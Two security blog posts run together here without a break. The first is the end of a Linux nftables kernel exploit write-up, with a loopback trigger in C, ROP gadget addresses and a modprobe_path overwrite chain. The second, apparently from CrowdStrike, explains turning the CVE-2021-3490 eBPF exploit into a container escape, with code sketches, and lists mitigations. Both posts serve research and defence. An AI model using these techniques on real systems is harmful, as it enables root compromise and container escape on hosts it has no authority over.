Trigger the call of nft_set->ops->delete by locally sending a network packet to 127.0.0.1. This can be done by simply opening a TCP socket to 127.0.0.1 at any port and issuing a connect() call.
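The trigger in the last step needs nothing more than a connection attempt on the loopback interface. A minimal sketch follows; the function name and the port are arbitrary choices, and the result of connect() is deliberately ignored because a refused connection still means a packet was sent.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Attempt a TCP connection to 127.0.0.1:port so that a packet with source
 * address 127.0.0.1 is processed locally.
 * Returns 0 if the attempt was made, -1 if no socket could be created. */
int poke_loopback(uint16_t port)
{
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd < 0)
        return -1;

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    /* Success or failure of the handshake does not matter here. */
    (void)connect(fd, (struct sockaddr *)&sa, sizeof(sa));
    close(fd);
    return 0;
}
```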
Escalating Privileges
Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.
A way of achieving this is as follows:
Pivot the stack to a memory area under control. When the delete function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an immediate expression in the rule created to achieve RIP control.
Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the MODPROBE_PATH global variable, the stack is pivoted again to the end of the fake nft_set object.
The stack pivot gadgets and ROP chain used can be found below.
// ROP gadget to pivot the stack to the nftables registers memory area
0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;
// ROP gadget to pivot the stack to the memory allocation holding the target nft_set
0xffffffff810b08f1: pop rsp ; ret ;
When the execution flow is redirected, the RSI register contains the address of the nftables registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake nft_set object.
// ROP chain used to overwrite the MODPROBE_PATH global variable
0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;
It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.
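For illustration, the three-gadget write shown above could be laid out in memory as follows. This is a partial sketch under stated assumptions: the gadget addresses are the ones quoted above for the unslid image, slide is the difference between the running and the unslid image base, and modprobe_path_addr is assumed to have been computed already. The function name and the one-store restriction (a path of at most 7 characters plus its terminator) are choices made for this example, and the return to userland is not shown.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Gadget addresses quoted in the text (unslid image). */
#define POP_RAX_RET     0xffffffff8148606bULL
#define POP_RDX_RET     0xffffffff8120f2fcULL
#define MOV_PTR_RAX_RDX 0xffffffff8132ab39ULL

/* Write the chain into out[], which must have room for 5 entries.
 * Returns the number of 8-byte slots used, or 0 if path does not fit
 * into a single 8-byte store together with its NUL terminator. */
size_t build_modprobe_chain(uint64_t *out, uint64_t slide,
                            uint64_t modprobe_path_addr, const char *path)
{
    uint64_t value = 0;
    size_t len = strlen(path);
    size_t i = 0;

    if (len > 7)
        return 0;
    /* Copy the bytes in memory order; unused bytes stay zero. */
    memcpy(&value, path, len);

    out[i++] = POP_RAX_RET + slide;      /* rax = destination address */
    out[i++] = modprobe_path_addr;
    out[i++] = POP_RDX_RET + slide;      /* rdx = new path bytes */
    out[i++] = value;
    out[i++] = MOV_PTR_RAX_RDX + slide;  /* *(u64 *)rax = rdx */
    return i;
}
```

A longer path would need the pop/pop/mov sequence repeated once per 8-byte chunk, with the destination advanced by 8 each time.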
Wrapping Up
We hope you enjoyed reading this and learned something new. If you are hungry for more, make sure to check our other blog posts.
We wish y’all a great Christmas holiday and a happy new year! Here’s to a 2023 with more bugs, exploits, and write-ups!
Today, containers are the preferred approach to deploy software or create build environments in CI/CD lifecycles. However, since the emergence of container solutions and environments like Docker and Kubernetes, security researchers have consistently found ways to escape from containers once they are compromised. Most attacks are based on configuration errors. But it is also possible to escalate privileges and escape to the container’s host system by exploiting vulnerabilities in the host’s operating system.
This blog shows how to modify an existing Linux kernel exploit in order to use it for container escapes and how the CrowdStrike Falcon® platform can help to prevent and hunt for similar threats.
Original Technique
Before we outline the modifications required to turn the exploit into a container escape, we first look at what the original exploit achieved.
Valentina Palmiotti published a full exploit for CVE-2021-3490 that can be used to locally escalate privileges to root on affected systems. The vulnerability was rooted in the eBPF subsystem of the Linux kernel and fixed in version 5.10.37. eBPF allows user space processes to load custom programs into the kernel and attach them to so-called events, thus giving user space the ability to observe kernel internals and, in specifically supported cases, to implement custom logic for networking, access control and other tasks. These eBPF programs have to pass a verifier before being loaded, which is supposed to guarantee that the code does not contain loops and does not write to memory outside of its dedicated area. This step should ensure that eBPF programs terminate and are not able to manipulate kernel memory, which would potentially allow attackers to escalate privileges. However, this verifier contained several vulnerabilities in the past. CVE-2021-3490 is one of them and can ultimately be used to achieve a kernel read and write primitive.
Building on the kernel read primitive, it is possible to leak a kernel pointer. eBPF programs can communicate with processes running in user space using so-called “eBPF maps.” Every eBPF map is described by a
. The exploit will leak that address and then use it as a starting point to further scan the kernel’s memory space and read pointers from the kernel’s symbol table.
The kernel exports pointers to certain variables, objects and functions in a symbol table to make them accessible by kernel modules. This table is called ksymtab. In order to look up the actual name of a stored symbol address, a second table, called kstrtab, is utilized. A pointer to the string in kstrtab that contains the name is stored as part of every ksymtab entry, right after the pointer to the symbol itself. To find the address of a kernel symbol, the exploit first reads memory from kernel space starting at the leaked address of array_map_ops using the arbitrary read primitive. This is done until the string containing the symbol name of interest is found in kstrtab.
Because kstrtab is mapped after ksymtab, the previously read memory region should contain the pointer to the string in kstrtab. Therefore, the exploit then proceeds to search for that pointer, and the pointer to the actual symbol is stored right before it.
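The two-step search described above can be sketched against a synthetic buffer. This is a simplified model, not the exploit's code: it assumes the absolute-pointer layout with two 8-byte fields per entry (symbol pointer, then name pointer), and the base address, symbol addresses and helper names are all made up for the example.

```python
import struct

BASE = 0xffffffff82000000  # hypothetical address where the dumped region starts


def build_fake_region(symbols):
    """Lay out absolute-pointer ksymtab entries followed by kstrtab strings."""
    ksymtab_size = 16 * len(symbols)
    entries = b""
    strtab = b"\x00"  # leading NUL so every name is preceded by a terminator
    for name, addr in symbols:
        name_ptr = BASE + ksymtab_size + len(strtab)
        entries += struct.pack("<QQ", addr, name_ptr)
        strtab += name.encode() + b"\x00"
    return entries + strtab


def find_symbol(region, name):
    """Step 1: locate the name string. Step 2: locate the pointer to it."""
    needle = b"\x00" + name.encode() + b"\x00"  # exact match, not a suffix
    pos = region.find(needle)
    if pos < 0:
        return None
    name_addr = BASE + pos + 1  # skip the leading NUL
    for off in range(8, len(region) - 7, 8):
        if struct.unpack_from("<Q", region, off)[0] == name_addr:
            # The symbol pointer sits right before the name pointer.
            return struct.unpack_from("<Q", region, off - 8)[0]
    return None


region = build_fake_region([
    ("array_map_ops", 0xffffffff82a01000),
    ("my_init_pid_ns", 0xffffffff82b00000),  # decoy sharing a suffix
    ("init_pid_ns", 0xffffffff82b5c020),
])
found = find_symbol(region, "init_pid_ns")
```

Anchoring the search on the surrounding NUL bytes avoids matching a longer symbol name that merely ends with the wanted string.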
One clarification has to be made about the above code excerpt: There are two different formats of ksymtab. In one case, the actual addresses of the symbols and kstrtab entries are stored. However, in many kernel builds it does not actually contain pointers but offsets such that the address where the offset is stored plus the offset itself is the symbol’s address or the string’s address in kstrtab.
Nevertheless, using this technique, the exploit identifies the address of init_pid_ns. This object is a struct pid_namespace and describes the default process ID namespace new processes are started in.
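For the offset-based ksymtab format mentioned above, the address arithmetic is a single addition. The sketch below assumes the offsets are signed 32-bit little-endian values, with the name offset stored four bytes after the value offset. The base address, buffer layout and function name are hypothetical.

```python
import struct


def resolve_prel32(region, base, field_off):
    """Address = address of the 32-bit field + the signed offset stored in it."""
    (rel,) = struct.unpack_from("<i", region, field_off)
    return base + field_off + rel


# Build one synthetic entry at offset 0x10 of a dumped region.
base = 0xffffffff82000000          # hypothetical address of region[0]
entry_off = 0x10
symbol_addr = base - 0x200000      # symbol lives below the table: negative offset
name_addr = base + 0x30            # name string lives after the table

region = bytearray(0x40)
struct.pack_into(
    "<ii", region, entry_off,
    symbol_addr - (base + entry_off),      # value offset, relative to its own field
    name_addr - (base + entry_off + 4),    # name offset, relative to its own field
)

resolved_symbol = resolve_prel32(region, base, entry_off)
resolved_name = resolve_prel32(region, base, entry_off + 4)
```

Because each offset is relative to the field that stores it, the value and name fields of the same entry need different base addresses when they are resolved.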
Namespaces have become a fundamental feature of Linux and are crucial to the idea of container environments. They allow separating system resources between different processes such that one process can observe a completely different set than others. For example, mount namespaces control observable filesystem mount points such that two processes can have different views of the filesystem. This allows a container’s filesystem to have a different root directory than the host. Process ID namespaces, on the other hand, give processes a completely separate process tree. The first process in a process ID namespace always has the identifier (PID) 1. It is considered the init process that initializes the operating system and from which new processes originate. Therefore, if this process is stopped, all other processes in that process ID namespace are stopped as well.
By identifying init_pid_ns, it is possible to enumerate all struct task_struct objects of the processes running in that namespace, as those are stored in a traversable radix tree in the field
object that contains the UID and GID (user and group identifier) associated with the process and therefore holds the granted permissions. By overwriting the cred object of a process, it is possible to escalate privileges by setting the UID and GID to 0, which is associated with the root user.
However, this approach does not work if a container was compromised and the attacker’s goal is to escape into the container’s host environment.
Why This Doesn’t Work in Containers
Linux kernel exploits are an alternative method to escape container environments to the host in case no mistakes in the container configuration were made. They can be used because containers share the host’s kernel and therefore its vulnerabilities, regardless of the Linux distribution the container is based on. However, exploit developers have to pay attention to some obstacles compared to privilege escalation outside of container environments.
First, container solutions are able to restrict the capabilities of processes running inside a container. For example, the capability CAP_SYS_ADMIN is normally not granted to processes running in containers, which therefore cannot mount file systems or execute various other privileged actions. Moreover, it is possible to restrict the set of syscalls a userland process can call by utilizing seccomp. For example, in the default configuration of Docker, an exploit would not be able to use eBPF at all. In the default Kubernetes configuration, however, seccomp does not restrict the available syscalls at all. For the remainder of this post, we will assume that the container is configured such that eBPF can be used by userland processes.
Second, on a more practical note, the techniques of the original exploit described above will not work out of the box. As already described, containers rely heavily on namespaces. Because containers typically have their own associated process ID namespace, it is not as straightforward to identify the exploit process running in the container by its PID: the exploit may have PID 42 from the container’s perspective but PID 1337 from the host’s perspective. However, the parent namespace can still observe all processes running in child namespaces, so those processes have a PID in both the parent and the child namespace. Ultimately, the initial process ID namespace described by init_pid_ns can observe any process running on a particular system. Nevertheless, even if we identify the task object of our exploit process within a container, overwriting its cred object as described previously will simply elevate privileges within the container but not allow a container escape.
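The relationship between host and container PIDs can be modelled in a few lines. This is a simplified illustration of the idea that a process carries one PID per namespace level it is visible in. The class and function names are invented for the example, and the PIDs 42 and 1337 are the ones used in the text above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PidNamespace:
    name: str
    level: int  # 0 for the initial namespace (init_pid_ns)


@dataclass
class Pid:
    # One (namespace, number) pair per level, index == namespace level.
    numbers: list


def pid_nr_in(pid, ns):
    """Return the PID as seen from `ns`, or None if `ns` cannot see the process."""
    if ns.level < len(pid.numbers) and pid.numbers[ns.level][0] is ns:
        return pid.numbers[ns.level][1]
    return None


host = PidNamespace("init_pid_ns", 0)
container = PidNamespace("container", 1)
other = PidNamespace("other-container", 1)

exploit = Pid([(host, 1337), (container, 42)])  # visible in both namespaces
host_shell = Pid([(host, 900)])                 # only exists on the host
```

The same process answers to 1337 when queried from the host namespace and to 42 from inside the container, while a host-only process is invisible to the container.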
Changes for Container Escapes
It is possible to modify the exploit so that a container escape is conducted and privileges are escalated to root on the host. To easily find the exploit process in a container, an exploit can search for the current_task and pcpu_base_addr symbols in ksymtab.
current_task stores the offset to the running process’s task object based on the address stored in pcpu_base_addr. Because pcpu_base_addr is unique per CPU core, the process must first be pinned to a single core using the
Using this technique, it is possible to identify the correct task object without traversing the radix tree of all processes stored in init_pid_ns.
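The pinning step and the address arithmetic described above might look like the following sketch. The name of the call used for pinning is missing from the text, so the use of `sched_setaffinity` here is an assumption. The helper names and the example addresses are hypothetical, and the code is Linux-only because Python exposes `os.sched_setaffinity` only there.

```python
import os


def pin_to_one_cpu():
    """Restrict the calling process to a single CPU and return its number."""
    cpu = min(os.sched_getaffinity(0))  # pick a CPU we are already allowed on
    os.sched_setaffinity(0, {cpu})      # pid 0 means the calling process
    return cpu


def current_task_slot(percpu_base, current_task_offset):
    """Address of the per-CPU slot holding the running task pointer.

    Follows the description above: per-CPU base plus the current_task offset.
    Both inputs would come from the kernel read primitive.
    """
    return (percpu_base + current_task_offset) & 0xFFFFFFFFFFFFFFFF


cpu = pin_to_one_cpu()
slot = current_task_slot(0xffff888100000000, 0x1fbc0)  # hypothetical values
```

Pinning first matters because the scheduler could otherwise migrate the process between reading the per-CPU base and reading the slot, which would yield another core's task.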
This allows the attacker to overwrite the correct cred object and therefore obtain root privileges. Due to the usage of namespaces, the observable file system is still that of the container, though. Nevertheless, it is possible to overcome that obstacle as well. The task object contains a pointer to a struct fs_struct object. This object contains information about the observable file system, i.e., which directory is considered the process’s file system root. Using the leaked pointer to init_pid_ns, it is possible to traverse the process radix tree and identify the host’s init process, which has PID 1. Next, it is possible to retrieve the fs pointer from this process’s task object. Lastly, while overwriting the cred object of the exploit process, the fs pointer must be overwritten as well using the init process’s fs pointer. The exploit process can then observe the complete host file system.
One last addition must be made. As stated above, containers normally have limited capabilities. Capabilities are used to restrict the permissions of processes running in containers. To obtain full privileges, the exploit also has to overwrite the capabilities mask of the exploit’s process in the task object. How exactly the values must be set to obtain full capabilities without any restrictions can be investigated in the definition of the
The technique described in this blog to identify the task object of the exploit’s process only works on Linux kernel versions before 5.15, as pcpu_base_addr is no longer exported as a symbol to ksymtab. Nevertheless, alternative methods exist to find the correct task object, e.g., by traversing the radix tree of all processes from init_pid_ns and matching on features of the exploit process other than the PID, such as the comm member of struct task_struct that contains the executable name.
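Matching on comm has one practical wrinkle: the kernel stores at most 15 characters of the executable name (TASK_COMM_LEN is 16, including the terminating NUL). The sketch below models the traversal result as a plain list of dictionaries. That list, the process names, and the helper names are hypothetical stand-ins for whatever the read primitive returns.

```python
TASK_COMM_LEN = 16  # kernel constant: 15 visible characters plus the NUL


def comm_of(executable_name):
    """Return the name as the kernel would store it in comm."""
    return executable_name[: TASK_COMM_LEN - 1]


def find_tasks_by_comm(tasks, executable_name):
    """Return every modelled task whose comm matches the truncated name."""
    wanted = comm_of(executable_name)
    return [task for task in tasks if task["comm"] == wanted]


# Hypothetical snapshot of tasks enumerated from init_pid_ns.
tasks = [
    {"host_pid": 1, "comm": "systemd"},
    {"host_pid": 1337, "comm": comm_of("exploit_with_a_long_name")},
    {"host_pid": 2000, "comm": "bash"},
]
matches = find_tasks_by_comm(tasks, "exploit_with_a_long_name")
```

Since comm is not unique, a match on a common name can return several tasks, so a distinctive executable name or an additional feature is needed to single out the right one.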
Container Escape Mitigations
Detecting this and similar exploits is very hard as they are data-only and misuse only legitimate system calls. The CrowdStrike Falcon platform can assist in preventing attacks using similar techniques for privilege escalation. As a defense-in-depth strategy, the following steps can be taken to harden Linux hosts and container environments to prevent exploitation of CVE-2021-3490 and future attacks.
1. Upgrade the kernel version. With a critical kernel vulnerability like CVE-2021-3490, it is paramount that available fixes are applied by upgrading the kernel version.
2. Provide only required capabilities to the container. Limiting the capabilities of the container restricts what its root account can do, which significantly reduces the chances of container escape and exploitation of kernel vulnerabilities. For example, to exploit CVE-2021-3490 using the described technique, the attacker needs CAP_BPF or CAP_SYS_ADMIN granted. Note that privileged containers have those capabilities. Therefore, you should monitor your environment for such containers with CrowdStrike Falcon® Cloud Workload Protection (CWP), as discussed in point 4 below.
3. Use a seccomp profile. While Kubernetes does not apply a seccomp profile without configuration, Docker’s default seccomp profile protects against a number of dangerous system calls that can help attackers break out of the container environment. Correct seccomp profiles can significantly reduce the container attack surface. CVE-2021-3490 requires the bpf system call to exploit the vulnerability, which is blocked in Docker’s default seccomp profile. Hence, exploitation of CVE-2021-3490 in a container environment using a strong seccomp profile would fail.
4. Monitor host and containerized environment for a breach. In case a privileged workload or a host is compromised by attackers, the organization needs state-of-the-art monitoring and detection capabilities to prevent and detect advanced persistent threats (APTs), eCrime and nation-state actors. CrowdStrike can help with this. Falcon Cloud Workload Protection identifies any indicators of misconfiguration (IOMs) in your containerized environment to uncover a weakness. It also prevents and detects malicious activity on your host and containers in real time, stopping breaches by eCrime and nation-state adversaries. For example, if a privileged container or a container without a seccomp profile is executed, the following notifications would appear:
Also, Falcon CWP helps to hunt for threats using the eBPF subsystem to escalate privileges by logging if the bpf system call was used by a process.
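The capability and seccomp hardening steps above can also be spot-checked by hand from the contents of /proc/&lt;pid&gt;/status. The sketch below is a minimal illustration and is unrelated to how Falcon performs its checks. It parses status text passed in as a string, the two samples are illustrative values and not output captured from a real system, and the helper names are hypothetical.

```python
CAP_SYS_ADMIN = 21  # bit positions from the kernel's capability numbering
CAP_BPF = 39        # added in Linux 5.8


def parse_status(text):
    """Turn 'Key:\tvalue' lines into a dictionary."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def audit(status_text):
    """Report whether the process could reach the bpf attack surface."""
    fields = parse_status(status_text)
    cap_eff = int(fields["CapEff"], 16)  # effective capability bitmask
    return {
        "cap_sys_admin": bool((cap_eff >> CAP_SYS_ADMIN) & 1),
        "cap_bpf": bool((cap_eff >> CAP_BPF) & 1),
        "seccomp_filter": fields.get("Seccomp") == "2",  # 2 means filter mode
    }


# Illustrative samples only.
restricted = "Name:\tapp\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n"
privileged = "Name:\tapp\nCapEff:\t000001ffffffffff\nSeccomp:\t0\n"

restricted_report = audit(restricted)
privileged_report = audit(privileged)
```

A workload that reports either capability together with no seccomp filter matches the risky configuration described in points 2 and 3.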
Conclusion
Container technology is a good solution to separate and fine-tune resources to different processes. However, while existing solutions add another layer of security due to the restriction of capabilities and available syscalls, the available attack surface inside a container still contains the host’s kernel. Every eased restriction — for example, allowing the use of eBPF — will increase the attack surface. If a threat actor is able to take advantage of a vulnerability inside the host’s kernel and an exploit is available, the host can be compromised, regardless of other security layers and restrictions such as namespaces.
This blog showed exactly that: Not much effort is needed to turn a full exploit chain for a local privilege escalation into one that is able to escape containers as well. The basic rules of network hygiene (patch early and often) apply not only to containers but also to the hosts that deploy them in a cloud environment. Moreover, solutions such as Docker and Kubernetes can reduce the attack surface drastically if configured properly. CrowdStrike Falcon Cloud Workload Protection can assist in identifying and hunting for weaknesses in the deployed configuration that could lead to a compromise.